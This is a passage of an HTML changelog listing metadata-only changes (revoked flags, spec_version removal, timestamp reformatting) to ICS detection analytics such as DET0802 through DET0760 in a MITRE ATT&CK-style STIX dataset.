1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[DET0802] Detection of Activate Firmware Update Mode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0764] Detection of Adversary-in-the-Middle</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0728] Detection of Alarm Suppression</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0734] Detection of Automated Collection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0748] Detection of Autorun Image</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_analytic_refs</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>['x-mitre-analytic--2b751a3d-c680-46c9-b92b-55a9d24bd4f9']</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0784] Detection of Block Command Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0910] Detection of Block Communications</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T21:48:05.256Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 21:48:05.256000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:27:42.639Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0911] Detection of Block Ethernet</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T22:42:31.791Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 22:42:31.791000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:27:51.377Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0903] Detection of Block Operational Technology Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T15:09:30.933Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:09:30.933000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:28:00.436Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0789] Detection of Block Reporting Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0797] Detection of Block Serial COM</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0912] Detection of Block Wi-Fi</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T22:56:48.997Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 22:56:48.997000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:28:13.555Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0908] Detection of Broadcast Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T20:32:50.322Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 20:32:50.322000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:29:42.421Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0737] Detection of Brute Force I/O</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0771] Detection of Change Credential</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0755] Detection of Change Operating Mode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0760] Detection of Command-Line Interface</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: 